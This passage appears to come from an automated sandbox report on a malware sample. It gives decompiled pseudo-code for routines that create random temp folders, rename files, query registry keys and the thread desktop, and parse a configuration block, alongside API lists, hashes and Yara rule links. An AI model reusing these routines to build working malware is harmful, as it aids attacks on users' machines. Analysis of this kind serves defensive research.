					_push(0xcb);
					return E0041252D(_t54, _v12, 0x7a);
				} else {
					_t60 =  &_v68;
					_t39 = 0x79;
					E004159A4(_t39, _t60);
					_v28 = 0x1a;
					_v24 = 0x26;
					_v20 = 0x23;
					_v16 = _t60;
					_t61 = 0;
					do {
						_t42 =  &_v644;
						__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t62 + _t61 * 4 - 0x18)), 0, 0, _t42);
						_t68 = _t42;
						if(_t42 == 0) {
							_t54 =  &_v16;
							E0041BB58( &_v644,  &_v16, _t68, 1, 2, E00413F55,  &_v12, 0, 0, 0);
						}
						_t61 = _t61 + 1;
					} while (_t61 < 3);
					_t70 = _v8;
					goto L9;
				}
			}

0x0041417a
0x0041417a
0x0041418f
0x00414199
0x0041419a
0x004141a4
0x004141a5
0x004141b8
0x004141c3
0x004141cb
0x004141cd
0x004141cf
0x004141dc
0x004141ed
0x004141ed
0x004141cf
0x004141f5
0x0041425d
0x0041425d
0x00000000
0x00414274
0x00414262
0x00000000
0x004141f7
0x004141f9
0x004141fc
0x004141fd
0x00414204
0x0041420b
0x00414212
0x00414219
0x0041421c
0x0041421e
0x0041421e
0x0041422c
0x00414232
0x00414234
0x00414246
0x0041424f
0x0041424f
0x00414254
0x00414255
0x0041425a
0x00000000
0x0041425a

APIs

Part of subcall function 0041A545: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,0040754A,?,?,00000104,.exe,00000000), ref: 0041A55A

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008,?,00000000,00000001), ref: 004141DC
SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,?,?,00000104,?,00000000,00000008,?,00000000,00000001), ref: 0041422C

Strings

#, xrefs: 00414212
&, xrefs: 0041420B

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: EnvironmentExpandFolderOpenPathStrings
String ID: #$&
API String ID: 1994525040-3870246384
Opcode ID: a5f55d67a6dff510097ce2e3116c4094a6fb5cd7b58e29bceb8589e112cff7b7
Instruction ID: 823bad2d37f11c272cbf2df305b4265e83d01467f0fc50182dc5f642cf022d4f
Opcode Fuzzy Hash: a5f55d67a6dff510097ce2e3116c4094a6fb5cd7b58e29bceb8589e112cff7b7
Instruction Fuzzy Hash: 1E3171B2D00218BADF10EBE19C89EDE777CEB44318F10446AF604F7180D6789EC98BA5

Uniqueness

Uniqueness Score: -1.00%

Function 0041B82F, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0041B82F(WCHAR* _a4) {
				short _v524;
				char _v1044;
				void* __edi;
				void* _t11;
				void* _t19;
				void* _t20;

				if(GetTempPathW(0xf6,  &_v524) - 1 > 0xf5) {
					L6:
					return 0;
				}
				_t19 = 0;
				while(1) {
					_push(E0041775A());
					_push(L"tmp");
					_t18 =  &_v1044;
					_t11 = E00417114(_t10, 0x104,  &_v1044, L"%s%08x");
					_t20 = _t20 + 0xc;
					if(_t11 == 0xffffffff) {
						goto L6;
					}
					if(E0041BCB4(_t18, _a4,  &_v524) == 0 || CreateDirectoryW(_a4, 0) == 0) {
						_t19 = _t19 + 1;
						if(_t19 < 0x64) {
							continue;
						}
						goto L6;
					} else {
						return 1;
					}
				}
				goto L6;
			}

0x0041b852
0x0041b8a8
0x00000000
0x0041b8a8
0x0041b854
0x0041b856
0x0041b85b
0x0041b85c
0x0041b86b
0x0041b871
0x0041b876
0x0041b87c
0x00000000
0x00000000
0x0041b891
0x0041b8a2
0x0041b8a6
0x00000000
0x00000000
0x00000000
0x0041b8b0
0x00000000
0x0041b8b0
0x0041b891
0x00000000

APIs

GetTempPathW.KERNEL32(000000F6,?,00000000,?), ref: 0041B846

Part of subcall function 0041775A: GetTickCount.KERNEL32 ref: 0041775A

Part of subcall function 0041BCB4: PathCombineW.SHLWAPI(?,a@,?,004061E6,?,?), ref: 0041BCD3

CreateDirectoryW.KERNEL32(?,00000000,?,?), ref: 0041B898

Strings

%s%08x, xrefs: 0041B861
tmp, xrefs: 0041B85C

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Path$CombineCountCreateDirectoryTempTick
String ID: %s%08x$tmp
API String ID: 1218007593-1196434543
Opcode ID: f527f1cec726aa347a7fc75e5943a88115c420c301e6ba5d9f3b75eb45fd84b0
Instruction ID: 0d7f81fb66a95d0b1df1bce088475a7dbc2741f56f684ad01be340aae66e29ed
Opcode Fuzzy Hash: f527f1cec726aa347a7fc75e5943a88115c420c301e6ba5d9f3b75eb45fd84b0
Instruction Fuzzy Hash: 23F0FFB11042282AEA207A309D46BEFB76CDF45B54F100132FE19A61E1D3799EC696EC

Uniqueness

Uniqueness Score: -1.00%

Function 00404C88, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404C88(WCHAR* __ebx) {
				void* __edi;
				void* __esi;
				long _t5;
				WCHAR* _t14;
				void* _t15;
				void* _t26;
				void* _t27;

				_t14 = __ebx;
				if( *0x4223a8 == 0) {
					E00406AB8(_t15, 0x4223a8, 0x4225b0, 2);
					 *((short*)(E0041645D(0x4225b0, 0x4223a8, E00416F70(0x4223a8) + _t11) + 0x4225b0)) = 0;
					_t5 = PathRemoveFileSpecW(0x4225b0);
					 *((intOrPtr*)(_t26 - 0x7ce78b25)) =  *((intOrPtr*)(_t26 - 0x7ce78b25)) + _t5;
				}
				if(_t14 != 0) {
					E004167C2(_t5 | 0xffffffff, 0x4223a8, _t14);
					_t5 = PathRenameExtensionW(_t14, L".tmp");
				}
				if( *((char*)(_t27 + 0xc)) != 0 &&  *0x422bac > 1) {
					E0041BA36(0x4225b0);
					E00419AA2(0x4225b0);
					_t5 = GetFileAttributesW(0x4223a8);
					if(_t5 != 0xffffffff) {
						_t5 = E00419AA2(0x4223a8);
					}
				}
				return _t5;
			}

0x00404c88
0x00404c9c
0x00404ca0
0x00404cb9
0x00404cc0
0x00404cc5
0x00404cc5
0x00404cc8
0x00404cd1
0x00404cdc
0x00404cdc
0x00404ce7
0x00404cf3
0x00404cf9
0x00404cff
0x00404d08
0x00404d0b
0x00404d0b
0x00404d08
0x00404d12

APIs

PathRemoveFileSpecW.SHLWAPI(004225B0,004225B0,004223A8,00000000,00000002,?,?,004052E0,00000000,?,00000000,000003FC,?,?,00000102), ref: 00404CC0
PathRenameExtensionW.SHLWAPI(?,.tmp,?,?,004052E0,00000000,?,00000000,000003FC,?,?,00000102), ref: 00404CDC
GetFileAttributesW.KERNEL32(004223A8,004225B0,004225B0,?,?,004052E0,00000000,?,00000000,000003FC,?,?,00000102), ref: 00404CFF

Part of subcall function 00406AB8: PathRenameExtensionW.SHLWAPI(?,.dat,?,004229A0,00000032,77E49EB0,?,00000000), ref: 00406B33

Strings

.tmp, xrefs: 00404CD6

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Path$ExtensionFileRename$AttributesRemoveSpec
String ID: .tmp
API String ID: 3627892477-2986845003
Opcode ID: 330d4d01a699f64eae04223d854e8781d7d4851c119fe0605637dc957a11a35d
Instruction ID: ece40d87d2c004f753ce4a39d82ac4b529a438e7cfb1bec1fe12c546555d8b6b
Opcode Fuzzy Hash: 330d4d01a699f64eae04223d854e8781d7d4851c119fe0605637dc957a11a35d
Instruction Fuzzy Hash: F0F08F70B002503AE32177366D49BAF15595FC2724B95853FF925B12F2DBBC48C6426D

Uniqueness

Uniqueness Score: -1.00%

Function 00408490, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408490(void* __edx) {
				long _v8;
				char _v116;
				void _v220;
				void* __esi;
				void* _t8;
				void* _t12;
				void* _t18;

				_t18 = __edx;
				_t8 = GetThreadDesktop(GetCurrentThreadId());
				if(_t8 != 0) {
					_t8 = GetUserObjectInformationW(_t8, 2,  &_v220, 0x64,  &_v8);
					if(_t8 != 0 && _v8 == 0x4e) {
						E00406762(0x2937498d,  &_v116, 0);
						_t8 = E00416492( &_v116,  &_v220, 0x4c);
						if(_t8 == 0) {
							_t12 = E0040809E( &_v220, _t18, 0x422e10, _t8);
							if(_t12 == 0) {
								return E00408309(0x422e10, 0);
							}
							 *0x422940 =  *0x422940 | 0x00000004;
							return _t12;
						}
					}
				}
				return _t8;
			}

0x00408490
0x004084a1
0x004084a9
0x004084bb
0x004084c3
0x004084d6
0x004084e6
0x004084ed
0x004084f5
0x004084fc
0x00000000
0x0040850b
0x004084fe
0x00000000
0x004084fe
0x004084ed
0x004084c3
0x00408512

APIs

GetCurrentThreadId.KERNEL32 ref: 0040849A
GetThreadDesktop.USER32(00000000), ref: 004084A1
GetUserObjectInformationW.USER32(00000000,00000002,?,00000064,)c@), ref: 004084BB

Part of subcall function 0040809E: TlsAlloc.KERNEL32(00422E10,00000000,0000018C,00000000,00000000), ref: 004080B7

Strings

)c@, xrefs: 004084AB, 004084C5, 004084AE

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$AllocCurrentDesktopInformationObjectUser
String ID: )c@
API String ID: 454308152-4040285577
Opcode ID: c6a80911e517e44bf578fb4346c602f4abe083668f2bd4c22ee71150e26b2bba
Instruction ID: a6b98ba24c0066dad2441e561bc5f2bc0ea09214408938c77a85bf2653028566
Opcode Fuzzy Hash: c6a80911e517e44bf578fb4346c602f4abe083668f2bd4c22ee71150e26b2bba
Instruction Fuzzy Hash: 230148706006147AEF10ABB19F45F9A326C6B40708F40407EF545B21D2EF79AE45866D

Uniqueness

Uniqueness Score: -1.00%

Function 0041BA36, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041BA36(WCHAR* _a4) {
				signed int _t4;
				short _t9;
				signed short _t10;
				WCHAR* _t11;
				WCHAR* _t12;
				int _t18;

				_t12 = _a4;
				_t9 = 0;
				_t11 = PathSkipRootW(_t12);
				if(_t11 == 0) {
					_t11 = _t12;
				}
				while(1) {
					_t4 =  *_t11 & 0x0000ffff;
					if(_t4 == 0x5c || _t4 == 0x2f || _t4 == 0) {
						goto L5;
					}
					L11:
					_t11 =  &(_t11[1]);
					continue;
					L5:
					_t10 = _t4;
					 *_t11 = 0;
					if(GetFileAttributesW(_t12) == 0xffffffff) {
						_t18 = CreateDirectoryW(_t12, 0);
					}
					if(_t18 == 0) {
						L13:
						return _t9;
					} else {
						if(_t10 == 0) {
							_t9 = 1;
							goto L13;
						}
						 *_t11 = _t10;
						goto L11;
					}
				}
			}

0x0041ba38
0x0041ba3f
0x0041ba47
0x0041ba4b
0x0041ba4d
0x0041ba4d
0x0041ba4f
0x0041ba4f
0x0041ba55
0x00000000
0x00000000
0x0041ba8d
0x0041ba8d
0x00000000
0x0041ba61
0x0041ba61
0x0041ba66
0x0041ba72
0x0041ba7d
0x0041ba7d
0x0041ba83
0x0041ba97
0x0041ba9a
0x0041ba85
0x0041ba88
0x0041ba92
0x00000000
0x0041ba92
0x0041ba8a
0x00000000
0x0041ba8a
0x0041ba83

APIs

PathSkipRootW.SHLWAPI(?,.exe,00000000,?,00000000,0040F046,?,?,?,?,?), ref: 0041BA41
GetFileAttributesW.KERNEL32(?,?,00000000,0040F046,?,?,?,?,?), ref: 0041BA69
CreateDirectoryW.KERNEL32(?,00000000,?,00000000,0040F046,?,?,?,?,?), ref: 0041BA77

Strings

.exe, xrefs: 0041BA3D

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: AttributesCreateDirectoryFilePathRootSkip
String ID: .exe
API String ID: 4231520044-4119554291
Opcode ID: 77f197e7d8d0df5ce09041799e73a062751f3542ff805b08db4af2bb0a526ee4
Instruction ID: 50c40f898219108e62a7147446040111ec88b0314f17285aba8ba2409b8ae035
Opcode Fuzzy Hash: 77f197e7d8d0df5ce09041799e73a062751f3542ff805b08db4af2bb0a526ee4
Instruction Fuzzy Hash: 14F0F6315C13115AC7301E2A48486E7B398DE01BE1B6A1A2BECD0E7770D739ACC192EC

Uniqueness

Uniqueness Score: -1.00%

Function 00417C28, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 26
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00417C28(void* __ecx) {
				signed int _v8;
				struct HINSTANCE__* _t7;

				_v8 = _v8 & 0x00000000;
				_t7 = GetModuleHandleW(L"kernel32.dll");
				if(_t7 == 0) {
					L4:
					return _t7 & 0xffffff00 | _v8 != 0x00000000;
				} else {
					_t7 = GetProcAddress(_t7, "IsWow64Process");
					if(_t7 == 0) {
						goto L4;
					} else {
						_t7 = _t7->i(0xffffffff,  &_v8);
						if(_t7 != 0) {
							goto L4;
						} else {
							return 0;
						}
					}
				}
			}

0x00417c2c
0x00417c35
0x00417c3d
0x00417c5f
0x00417c67
0x00417c3f
0x00417c45
0x00417c4d
0x00000000
0x00417c4f
0x00417c55
0x00417c59
0x00000000
0x00417c5b
0x00417c5e
0x00417c5e
0x00417c59
0x00417c4d

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,?,0040605C,00000000,00406583), ref: 00417C35
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00417C45

Strings

kernel32.dll, xrefs: 00417C30
IsWow64Process, xrefs: 00417C3F

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: IsWow64Process$kernel32.dll
API String ID: 1646373207-3024904723
Opcode ID: 1e1ccda3af9c76576ecb9dc05f46b47a7bd1e27024f96bc0a03e168f2e637909
Instruction ID: bc99cfb7de9887e9f8ebd36b980b5f91688a883b7dee8070f2601d2cfaf11cef
Opcode Fuzzy Hash: 1e1ccda3af9c76576ecb9dc05f46b47a7bd1e27024f96bc0a03e168f2e637909
Instruction Fuzzy Hash: C9E04F71308206B7DF0497A18D0AB9B33A89B417D9F2002A9A111F20D1FAB8DA44966C

Uniqueness

Uniqueness Score: -1.00%

Function 00411735, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00411735(intOrPtr _a4, intOrPtr _a12) {
				void* __esi;
				void* _t6;
				signed int _t7;

				if(_a12 == 0x64 || _a12 == 0x33) {
					EnterCriticalSection(0x4230dc);
					_t7 = E004110FC(_a4);
					if(_t7 != 0xffffffff) {
						_t7 = SetEvent( *(_t7 * 0x24 +  *0x4230f4 + 4));
					}
					LeaveCriticalSection(0x4230dc);
					return _t7;
				}
				return _t6;
			}

0x0041173a
0x0041174b
0x00411755
0x0041175d
0x0041176c
0x0041176c
0x00411773
0x00000000
0x0041177a
0x0041177b

APIs

EnterCriticalSection.KERNEL32(004230DC), ref: 0041174B
SetEvent.KERNEL32(?), ref: 0041176C
LeaveCriticalSection.KERNEL32(004230DC), ref: 00411773

Strings

3, xrefs: 0041173C

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterEventLeave
String ID: 3
API String ID: 3094578987-1842515611
Opcode ID: 497b0d9035bf837987d528813f9f840c99541d1a32d12e62e96f63e81b13ad32
Instruction ID: d4a5d71a9a050570df3702cbbba11139207db9d1f7b6426585737e9d93d6d478
Opcode Fuzzy Hash: 497b0d9035bf837987d528813f9f840c99541d1a32d12e62e96f63e81b13ad32
Instruction Fuzzy Hash: 31E09B31104100DFC7145B25ED4989B7B74EBD5332B00C53EF625A72B0C7388982CF15

Uniqueness

Uniqueness Score: -1.00%

Function 0040FB3F, Relevance: 6.3, APIs: 4, Instructions: 303
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E0040FB3F(void* __edx, intOrPtr _a4) {
				signed int _v12;
				int _v16;
				void* _v20;
				int _v24;
				signed int _v28;
				int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _v56;
				signed int _v60;
				signed int _v64;
				intOrPtr _v74;
				intOrPtr _v78;
				char _v80;
				struct _SYSTEMTIME _v96;
				char _v112;
				short _v184;
				short _v288;
				void* __ebx;
				void* __esi;
				signed int _t127;
				signed int _t131;
				signed int _t132;
				signed int _t133;
				signed int _t134;
				signed int _t140;
				signed int _t142;
				signed int _t143;
				signed int _t151;
				signed int _t155;
				signed int _t159;
				signed char _t163;
				signed int _t167;
				signed int _t176;
				signed int _t177;
				signed int _t186;
				long _t191;
				long _t195;
				signed int _t201;
				void* _t202;
				signed int _t203;
				signed int _t208;
				signed int _t211;
				signed int _t212;
				signed int _t219;
				short* _t230;
				signed int _t238;
				intOrPtr _t239;
				void* _t244;

				_t239 = _a4;
				_t126 =  *((intOrPtr*)(_t239 + 0x40));
				if( *((intOrPtr*)(_t239 + 0x40)) != 0) {
					_t127 = E0041BF9B( &_v12, __edx, __eflags, _t126, 0x4e27, 0x10000000);
					 *(_t239 + 0x3c) =  *(_t239 + 0x3c) & 0x00000000;
					 *(_t239 + 0x38) =  *(_t239 + 0x38) & 0x00000000;
					_t238 = _t127;
					_v64 = _t238;
					__eflags = _t238;
					if(_t238 == 0) {
						L55:
						E00416421(_v64);
						__eflags = 0 -  *(_t239 + 0x3c);
						asm("sbb eax, eax");
						return  ~0x00000000;
					}
					_t131 = _v12;
					__eflags = _t131 - 0x10;
					if(_t131 <= 0x10) {
						goto L55;
					}
					__eflags =  *((char*)(_t239 + 0x18)) - 1;
					_v16 = 1;
					_t132 = _t131 + _t238;
					__eflags = _t132;
					_v28 = ((0 |  *((char*)(_t239 + 0x18)) != 0x00000001) - 0x00000001 & 0xffffffe0) + 0x00000040 & 0x0000ffff;
					_v12 = _t132;
					while(1) {
						_t133 =  *(_t238 + 2) & 0x0000ffff;
						__eflags = _t133 - 0x10;
						if(_t133 < 0x10) {
							goto L55;
						}
						_t219 =  *(_t238 + 4) & 0x0000ffff;
						__eflags = _t219 - _t133;
						if(_t219 >= _t133) {
							goto L55;
						}
						__eflags =  *(_t238 + 6) - _t133;
						if( *(_t238 + 6) >= _t133) {
							goto L55;
						}
						__eflags =  *(_t238 + 8) - _t133;
						if( *(_t238 + 8) >= _t133) {
							goto L55;
						}
						__eflags =  *(_t238 + 0xa) - _t133;
						if( *(_t238 + 0xa) >= _t133) {
							goto L55;
						}
						__eflags =  *(_t238 + 0xc) - _t133;
						if( *(_t238 + 0xc) >= _t133) {
							goto L55;
						}
						__eflags =  *(_t238 + 0xe) - _t133;
						if( *(_t238 + 0xe) >= _t133) {
							goto L55;
						}
						_t134 =  *_t238 & 0x0000ffff;
						_t208 = _t134 >> 0x00000009 & 0x00000008;
						_t220 = _t238 + _t219;
						__eflags = (_t134 & _v28) - _v28;
						if((_t134 & _v28) != _v28) {
							L48:
							_t238 = _t238 + ( *(_t238 + 2) & 0x0000ffff);
							_t102 = _t238 + 0x10; // 0x10
							__eflags = _t102 - _v12;
							if(_t102 > _v12) {
								goto L55;
							}
							__eflags = ( *(_t238 + 2) & 0x0000ffff) + _t238 - _v12;
							if(( *(_t238 + 2) & 0x0000ffff) + _t238 > _v12) {
								goto L55;
							}
							_v16 = _v16 + 1;
							continue;
						}
						_t234 = _t208;
						_t140 = E0040F81C(_t220, _t208,  *((intOrPtr*)(_t239 + 8)),  *((intOrPtr*)(_t239 + 0xc)));
						__eflags = _t140;
						if(_t140 == 0) {
							goto L48;
						}
						_t141 =  *(_t239 + 0x44);
						__eflags =  *(_t239 + 0x44);
						if(__eflags == 0) {
							L16:
							_t142 =  *(_t238 + 8) & 0x0000ffff;
							__eflags = _t142;
							if(_t142 == 0) {
								L18:
								_t143 =  *(_t238 + 0xa) & 0x0000ffff;
								__eflags = _t143;
								if(_t143 == 0) {
									L20:
									__eflags =  *_t238 & 0x00000010;
									if(( *_t238 & 0x00000010) == 0) {
										L31:
										E004164D4( &_v60,  &_v60, 0, 0x1c);
										_v60 =  *_t238 & 0x0000ffff;
										_t209 = _t208 | 0xffffffff;
										_v56 = E0041687F(_t208 | 0xffffffff, ( *(_t238 + 4) & 0x0000ffff) + _t238);
										_t151 =  *(_t238 + 6) & 0x0000ffff;
										__eflags = _t151;
										if(_t151 != 0) {
											__eflags = _t151 + _t238;
											_v52 = E0041687F(_t209, _t151 + _t238);
										} else {
											_v52 = _v52 & 0x00000000;
										}
										_t155 =  *(_t238 + 0xc) & 0x0000ffff;
										__eflags = _t155;
										if(_t155 != 0) {
											__eflags = _t155 + _t238;
											_v48 = E0041687F(_t209, _t155 + _t238);
										} else {
											_v48 = _v48 & 0x00000000;
										}
										_t159 =  *(_t238 + 0xe) & 0x0000ffff;
										__eflags = _t159;
										if(_t159 != 0) {
											__eflags = _t159 + _t238;
											_v44 = E0041687F(_t209, _t159 + _t238);
										} else {
											_v44 = _v44 & 0x00000000;
										}
										_t163 =  *_t238 & 0x0000ffff;
										__eflags = _t163 & 0x00000003;
										if((_t163 & 0x00000003) != 0) {
											E00410A7F( *(_t239 + 0x3c),  *(_t239 + 0x38));
											 *(_t239 + 0x3c) =  *(_t239 + 0x3c) & 0x00000000;
											_t167 = E00416474(__eflags,  &_v60, 0x1c);
											 *(_t239 + 0x38) = _t167;
											__eflags = _t167;
											if(_t167 == 0) {
												E00410A56( &_v60);
												_t239 = _a4;
											} else {
												 *(_t239 + 0x3c) =  *(_t239 + 0x3c) + 1;
											}
											goto L55;
										} else {
											__eflags = _t163 & 0x0000000c;
											if(__eflags == 0) {
												E00410A56( &_v60);
												L47:
												_t239 = _a4;
												goto L48;
											}
											_t211 = E0041BF9B( &_v36, _t234, __eflags,  *((intOrPtr*)(_t239 + 0x40)), _v16, 0x40000000);
											_v40 = _t211;
											__eflags = _t211;
											if(_t211 == 0) {
												L54:
												E00416421(_t211);
												E00410A56( &_v60);
												_t239 = _a4;
												E00410A7F( *(_t239 + 0x3c),  *((intOrPtr*)(_a4 + 0x38)));
												_t122 = _t239 + 0x3c;
												 *_t122 =  *(_t239 + 0x3c) & 0x00000000;
												__eflags =  *_t122;
												goto L55;
											}
											_t176 = E0041C66D(_t211, _v36);
											__eflags = _t176;
											if(_t176 == 0) {
												goto L54;
											}
											_t177 = E004163AC(( *(_t239 + 0x3c) + 1) * 0x1c, _t239 + 0x38);
											__eflags = _t177;
											if(_t177 == 0) {
												goto L54;
											}
											 *(_a4 + 0x3c) =  *(_a4 + 0x3c) + 1;
											E0041645D( *(_a4 + 0x3c) * 0x1c +  *((intOrPtr*)(_t178 + 0x38)),  &_v60, 0x1c);
											goto L47;
										}
									}
									__eflags =  *(_t238 + 0xc);
									if( *(_t238 + 0xc) <= 0) {
										goto L31;
									}
									E00406B47( &_v184, _t220, 1,  &_v288);
									_t186 = E004176C6( &_v112, ( *(_t238 + 0xc) & 0x0000ffff) + _t238, E00416F5E(( *(_t238 + 0xc) & 0x0000ffff) + _t238));
									__eflags = _t186;
									if(_t186 == 0) {
										goto L48;
									}
									_t230 =  &_v184;
									_t212 = 0;
									__eflags = 0;
									do {
										E00416789( *((intOrPtr*)(_t244 + _t212 - 0x6c)), _t230);
										_t212 = _t212 + 1;
										_t230 = _t230 + 4;
										__eflags = _t212 - 0x10;
									} while (_t212 < 0x10);
									_v32 = _v32 | 0xffffffff;
									_t208 = 0x10;
									 *_t230 = 0;
									_v24 = _t208;
									_v20 = 0x80000001;
									_t191 = RegOpenKeyExW(0x80000001,  &_v288, 0, 1,  &_v20);
									__eflags = _t191;
									if(_t191 != 0) {
										goto L31;
									}
									_t195 = RegQueryValueExW(_v20,  &_v184, 0, 0,  &_v80,  &_v24);
									__eflags = _t195;
									if(_t195 == 0) {
										_v32 = _v24;
									}
									RegCloseKey(_v20);
									__eflags = _v32 - _t208;
									if(_v32 == _t208) {
										GetLocalTime( &_v96);
										__eflags = _v74 - _v96.wDay;
										if(_v74 != _v96.wDay) {
											goto L31;
										}
										__eflags = _v78 - _v96.wMonth;
										if(_v78 == _v96.wMonth) {
											goto L48;
										}
									}
									goto L31;
								}
								_t220 = _t238 + _t143;
								_t201 = E0040F851(_t238 + _t143,  *((intOrPtr*)(_t239 + 0x24)),  *((intOrPtr*)(_t239 + 0x28)));
								__eflags = _t201;
								if(_t201 == 0) {
									goto L48;
								}
								goto L20;
							}
							_t220 = _t238 + _t142;
							_t202 = E0040F851(_t238 + _t142,  *((intOrPtr*)(_t239 + 0x24)),  *((intOrPtr*)(_t239 + 0x28)));
							__eflags = _t202 - 1;
							if(_t202 == 1) {
								goto L48;
							}
							goto L18;
						}
						_t203 = E0040FAD7(_t220, _t234, __eflags, 4, _t141,  *((intOrPtr*)(_t239 + 8)),  *((intOrPtr*)(_t239 + 0xc)), _t208);
						__eflags = _t203;
						if(_t203 != 0) {
							goto L48;
						}
						goto L16;
					}
					goto L55;
				}
				return 0;
			}

0x0040fb4a
0x0040fb4d
0x0040fb53
0x0040fb6a
0x0040fb6f
0x0040fb73
0x0040fb77
0x0040fb79
0x0040fb7c
0x0040fb7e
0x0040fee1
0x0040fee4
0x0040feeb
0x0040feee
0x00000000
0x0040fef0
0x0040fb84
0x0040fb87
0x0040fb8a
0x00000000
0x00000000
0x0040fb92
0x0040fb96
0x0040fbaa
0x0040fbaa
0x0040fbac
0x0040fbaf
0x0040fbb2
0x0040fbb2
0x0040fbb6
0x0040fbb9
0x00000000
0x00000000
0x0040fbbf
0x0040fbc3
0x0040fbc6
0x00000000
0x00000000
0x0040fbcc
0x0040fbd0
0x00000000
0x00000000
0x0040fbd6
0x0040fbda
0x00000000
0x00000000
0x0040fbe0
0x0040fbe4
0x00000000
0x00000000
0x0040fbea
0x0040fbee
0x00000000
0x00000000
0x0040fbf4
0x0040fbf8
0x00000000
0x00000000
0x0040fbfe
0x0040fc09
0x0040fc0c
0x0040fc0f
0x0040fc13
0x0040fe6b
0x0040fe6f
0x0040fe71
0x0040fe74
0x0040fe77
0x00000000
0x00000000
0x0040fe7f
0x0040fe82
0x00000000
0x00000000
0x0040fe84
0x00000000
0x0040fe84
0x0040fc1c
0x0040fc21
0x0040fc26
0x0040fc28
0x00000000
0x00000000
0x0040fc2e
0x0040fc31
0x0040fc33
0x0040fc4c
0x0040fc4c
0x0040fc50
0x0040fc53
0x0040fc6b
0x0040fc6b
0x0040fc6f
0x0040fc72
0x0040fc8a
0x0040fc8a
0x0040fc8d
0x0040fd71
0x0040fd79
0x0040fd81
0x0040fd8b
0x0040fd95
0x0040fd98
0x0040fd9c
0x0040fd9f
0x0040fda7
0x0040fdb1
0x0040fda1
0x0040fda1
0x0040fda1
0x0040fdb4
0x0040fdb8
0x0040fdbb
0x0040fdc3
0x0040fdcd
0x0040fdbd
0x0040fdbd
0x0040fdbd
0x0040fdd0
0x0040fdd4
0x0040fdd7
0x0040fddf
0x0040fde9
0x0040fdd9
0x0040fdd9
0x0040fdd9
0x0040fdec
0x0040fdef
0x0040fdf1
0x0040fe92
0x0040fe97
0x0040fea1
0x0040fea6
0x0040fea9
0x0040feab
0x0040feb5
0x0040feba
0x0040fead
0x0040fead
0x0040fead
0x00000000
0x0040fdf7
0x0040fdf7
0x0040fdf9
0x0040fe63
0x0040fe68
0x0040fe68
0x00000000
0x0040fe68
0x0040fe0e
0x0040fe10
0x0040fe13
0x0040fe15
0x0040febf
0x0040fec0
0x0040fec8
0x0040fed3
0x0040fed8
0x0040fedd
0x0040fedd
0x0040fedd
0x00000000
0x0040fedd
0x0040fe20
0x0040fe25
0x0040fe27
0x00000000
0x00000000
0x0040fe37
0x0040fe3c
0x0040fe3e
0x00000000
0x00000000
0x0040fe4f
0x0040fe59
0x00000000
0x0040fe59
0x0040fdf1
0x0040fc93
0x0040fc98
